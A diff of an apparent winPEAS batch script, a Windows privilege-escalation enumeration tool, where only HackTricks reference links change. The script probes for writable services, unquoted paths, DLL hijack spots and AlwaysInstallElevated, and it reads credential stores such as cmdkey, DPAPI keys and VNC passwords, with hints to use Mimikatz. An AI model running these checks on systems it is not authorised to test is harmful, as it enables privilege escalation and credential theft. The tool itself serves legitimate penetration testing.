CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS"
ECHO. [i] Check for vulnerabilities for the OS version with the applied patches ECHO. [i] Check for vulnerabilities for the OS version with the applied patches
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
systeminfo systeminfo
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -174,7 +174,7 @@ CALL :T_Progress 1
:UACSettings :UACSettings
CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" CALL :ColorLine " %E%33m[+]%E%97m UAC Settings"
ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -225,7 +225,7 @@ CALL :T_Progress 1
:InstalledSoftware :InstalledSoftware
CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE"
ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
ECHO. ECHO.
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
@ -236,7 +236,7 @@ CALL :T_Progress 2
:RemodeDeskCredMgr :RemodeDeskCredMgr
CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -244,7 +244,7 @@ CALL :T_Progress 1
:WSUS :WSUS
CALL :ColorLine " %E%33m[+]%E%97m WSUS" CALL :ColorLine " %E%33m[+]%E%97m WSUS"
ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://"
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -252,7 +252,7 @@ CALL :T_Progress 1
:RunningProcesses :RunningProcesses
CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES"
ECHO. [i] Something unexpected is running? Check for vulnerabilities ECHO. [i] Something unexpected is running? Check for vulnerabilities
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
tasklist /SVC tasklist /SVC
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -273,7 +273,7 @@ CALL :T_Progress 3
:RunAtStartup :RunAtStartup
CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP"
ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#run-at-startup
::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^
@ -297,7 +297,7 @@ CALL :T_Progress 2
:AlwaysInstallElevated :AlwaysInstallElevated
CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?"
ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) ECHO. [i] If '1' then you can install a .msi file with admin privileges ;)
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul
ECHO. ECHO.
@ -361,7 +361,7 @@ CALL :T_Progress 1
:BasicUserInfo :BasicUserInfo
CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO
ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
ECHO. ECHO.
CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER"
net user %username% net user %username%
@ -435,7 +435,7 @@ ECHO.
:ServiceBinaryPermissions :ServiceBinaryPermissions
CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do (
for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO.
) )
@ -444,7 +444,7 @@ CALL :T_Progress 1
:CheckRegistryModificationAbilities :CheckRegistryModificationAbilities
CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -453,7 +453,7 @@ CALL :T_Progress 1
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
ECHO. [i] The permissions are also checked and filtered using icacls ECHO. [i] The permissions are also checked and filtered using icacls
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO.
@ -468,7 +468,7 @@ ECHO.
CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable"
ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. )
ECHO. ECHO.
CALL :T_Progress 1 CALL :T_Progress 1
@ -477,7 +477,7 @@ CALL :T_Progress 1
CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS"
ECHO. ECHO.
CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
cmdkey /list cmdkey /list
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -485,14 +485,14 @@ CALL :T_Progress 2
:DPAPIMasterKeys :DPAPIMasterKeys
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul
powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul
CALL :T_Progress 2 CALL :T_Progress 2
CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS"
ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
ECHO. ECHO.
ECHO.Looking inside %appdata%\Microsoft\Credentials\ ECHO.Looking inside %appdata%\Microsoft\Credentials\
ECHO. ECHO.
@ -565,7 +565,7 @@ CALL :T_Progress 2
:AppCMD :AppCMD
CALL :ColorLine " %E%33m[+]%E%97m AppCmd" CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
ECHO. ECHO.
CALL :T_Progress 2 CALL :T_Progress 2
@ -573,7 +573,7 @@ CALL :T_Progress 2
:RegFilesCredentials :RegFilesCredentials
CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials" CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
ECHO. [i] Searching specific files that may contains credentials. ECHO. [i] Searching specific files that may contains credentials.
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
reg query HKCU\Software\ORL\WinVNC3\Password 2>nul reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
CALL :T_Progress 2 CALL :T_Progress 2

BIN
win/winPEAS.exe
View File

Binary file not shown.

BIN
win/winPEASx64.exe
View File

Binary file not shown.